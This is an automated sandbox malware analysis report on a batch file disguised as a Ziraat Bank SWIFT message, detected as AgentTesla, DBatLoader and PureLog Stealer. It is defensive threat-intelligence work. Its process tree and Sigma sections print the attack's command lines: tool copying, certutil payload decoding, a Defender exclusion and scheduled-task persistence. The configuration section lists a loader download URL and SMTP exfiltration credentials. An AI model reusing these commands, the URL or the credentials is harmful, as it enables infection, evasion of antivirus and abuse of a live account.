Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd

Overview

General Information

Sample name:Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd
Analysis ID:1557464
MD5:5f351f07b94613764a8bc09970bbcd58
SHA1:47fcfcac926a0007010b7afb776671d2276b8b81
SHA256:2a81c419a9fcd1eb9f778dba6911c366586b0ae9a5cf2cd25155413bfbff9eea
Tags:cmduser-lowmal3
Infos:

Detection

AgentTesla, DBatLoader, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates files in the system32 config directory
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops large PE files
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Registers a new ROOT certificate
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to many different domains
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Spawns drivers
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6216 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 5640 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 1540 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 5896 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 6660 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 6680 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 4508 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 6816 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • AnyDesk.PIF (PID: 6588 cmdline: C:\Users\Public\Libraries\AnyDesk.PIF MD5: 2EF70D96354CC04D9168E8F69E7B17A0)
      • cmd.exe (PID: 6836 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 1624 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
        • esentutl.exe (PID: 1552 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
        • alpha.pif (PID: 3256 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • alpha.pif (PID: 2380 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • alpha.pif (PID: 316 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • xpha.pif (PID: 2260 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • esentutl.exe (PID: 2044 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
        • conhost.exe (PID: 1268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aymtmquJ.pif (PID: 3168 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
        • Native_neworigin.exe (PID: 2724 cmdline: "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
        • Trading_AIBot.exe (PID: 2032 cmdline: "C:\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
          • powershell.exe (PID: 3988 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 4232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 1580 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • schtasks.exe (PID: 5576 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 1832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • alpha.exe (PID: 2848 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 5896 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • alg.exe (PID: 5368 cmdline: C:\Windows\System32\alg.exe MD5: 39868E9AD4918B18A6AD00C9FF3BE84E)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 1916 cmdline: C:\Windows\system32\AppVClient.exe MD5: 7CB21DCAD3B21967F4E5DF9CF3F75EC0)
  • Juqmtmya.PIF (PID: 1588 cmdline: "C:\Users\Public\Libraries\Juqmtmya.PIF" MD5: 2EF70D96354CC04D9168E8F69E7B17A0)
    • aymtmquJ.pif (PID: 2468 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • Native_neworigin.exe (PID: 1260 cmdline: "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://gxe0.com/yak2/233_Juqmtmyadyy"]}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "s82.gocheapweb.com\"", "Username": "info2@j-fores.com", "Password": "london@1759 "}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000020.00000003.1680680146.000000000089E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000020.00000002.1948863536.0000000005180000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      0000002F.00000003.1847868691.0000000000891000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        0000000F.00000003.1293644753.000000007FC50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          0000000F.00000003.1294144317.000000007F920000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            Click to see the 14 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            32.2.Native_neworigin.exe.2b26216.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              47.2.Native_neworigin.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
              • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
              • 0x700:$s3: 83 EC 38 53 B0 33 88 44 24 2B 88 44 24 2F B0 50 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
              • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
              • 0x1e9d0:$s5: delete[]
              • 0x1de88:$s6: constructor or from DllMain.
              47.2.Native_neworigin.exe.3eac190.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                47.3.Native_neworigin.exe.891c18.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  32.3.Native_neworigin.exe.89ece0.17.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    Click to see the 32 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 6588, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                    Sigma detected: Execution from Suspicious Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6216, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 1540, ProcessName: alpha.exe
                    Sigma detected: New RUN Key Pointing to Suspicious Folder
                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Juqmtmya.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 6588, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya
                    Sigma detected: Parent in Public Folder Suspicious Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 1540, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 5896, ProcessName: extrac32.exe
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2032, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3988, ProcessName: powershell.exe
                    Sigma detected: Suspicious Program Location with Network Connections
                    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 198.252.105.91, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\AnyDesk.PIF, Initiated: true, ProcessId: 6588, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Juqmtmya.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 6588, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\AnyDesk.PIF, NewProcessName: C:\Users\Public\Libraries\AnyDesk.PIF, OriginalFileName: C:\Users\Public\Libraries\AnyDesk.PIF, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6216, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 6588, ProcessName: AnyDesk.PIF
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2032, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3988, ProcessName: powershell.exe
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 2032, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2032, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5576, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, Initiated: true, ProcessId: 2724, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49922
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2032, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5576, ProcessName: schtasks.exe
                    Sigma detected: Use Short Name Path in Command Line
                    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, ParentCommandLine: C:\Users\Public\Libraries\aymtmquJ.pif, ParentImage: C:\Users\Public\Libraries\aymtmquJ.pif, ParentProcessId: 3168, ParentProcessName: aymtmquJ.pif, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe" , ProcessId: 2724, ProcessName: Native_neworigin.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2032, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3988, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:56:12.974837+010020283713Unknown Traffic192.168.2.749700198.252.105.91443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:59:12.740525+010020516541A Network Trojan was detected192.168.2.7557731.1.1.153UDP
                    2024-11-18T09:59:23.892905+010020516541A Network Trojan was detected192.168.2.7528191.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:58:39.336228+010020516511A Network Trojan was detected192.168.2.7611181.1.1.153UDP
                    2024-11-18T09:58:58.230245+010020516511A Network Trojan was detected192.168.2.7502421.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:59:05.904050+010020516531A Network Trojan was detected192.168.2.7537581.1.1.153UDP
                    2024-11-18T09:59:17.857629+010020516531A Network Trojan was detected192.168.2.7587511.1.1.153UDP
                    2024-11-18T09:59:17.880138+010020516531A Network Trojan was detected192.168.2.7587511.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:59:21.215052+010020516501A Network Trojan was detected192.168.2.7530531.1.1.153UDP
                    2024-11-18T09:59:21.247295+010020516501A Network Trojan was detected192.168.2.7530531.1.1.153UDP
                    2024-11-18T09:59:31.371397+010020516501A Network Trojan was detected192.168.2.7654641.1.1.153UDP
                    2024-11-18T09:59:31.395946+010020516501A Network Trojan was detected192.168.2.7654641.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:59:42.932074+010020516521A Network Trojan was detected192.168.2.7555891.1.1.153UDP
                    2024-11-18T09:59:51.959681+010020516521A Network Trojan was detected192.168.2.7592181.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:56:57.079419+010020516491A Network Trojan was detected192.168.2.7505011.1.1.153UDP
                    2024-11-18T09:57:01.012200+010020516491A Network Trojan was detected192.168.2.7502481.1.1.153UDP
                    2024-11-18T09:57:31.231494+010020516491A Network Trojan was detected192.168.2.7545071.1.1.153UDP
                    2024-11-18T10:00:03.732796+010020516491A Network Trojan was detected192.168.2.7625101.1.1.153UDP
                    2024-11-18T10:00:09.051307+010020516491A Network Trojan was detected192.168.2.7571651.1.1.153UDP
                    2024-11-18T10:00:09.083433+010020516491A Network Trojan was detected192.168.2.7571651.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:56:55.359429+010020516481A Network Trojan was detected192.168.2.7594651.1.1.153UDP
                    2024-11-18T09:56:58.704311+010020516481A Network Trojan was detected192.168.2.7600921.1.1.153UDP
                    2024-11-18T09:57:29.842892+010020516481A Network Trojan was detected192.168.2.7545671.1.1.153UDP
                    2024-11-18T10:00:01.256401+010020516481A Network Trojan was detected192.168.2.7539261.1.1.153UDP
                    2024-11-18T10:00:07.633314+010020516481A Network Trojan was detected192.168.2.7519801.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
